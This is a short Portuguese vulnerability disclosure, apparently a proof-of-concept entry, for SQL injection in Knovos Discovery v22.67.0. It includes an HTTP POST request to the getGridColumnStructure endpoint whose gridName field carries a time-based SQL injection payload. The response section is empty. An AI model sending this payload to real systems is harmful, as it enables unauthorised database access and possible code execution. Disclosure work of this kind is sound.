
Exploração de prova de conceito para injeção de SQL no Knovos Discovery v22.67.0, demonstrando execução remota de código por meio do endpoint getGridColumnStructure.
Vulnerabilidade de injeção SQL no Knovos Discovery v.22.67.0 permite que um atacante remoto execute código arbitrário através do componente /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure
Injeção SQL
Knovos Discovery
Versão 22.67.0 - Versão 22.67.0
/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure
Remoto
verdadeiro
verdadeiro
usuário autorizado
Requisição:
POST /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure?caseMappingId=*** HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
{
"gridName":"Inventory-grid' waitfor delay'0:0:50'--",
"uID":"10"
}
Resposta:
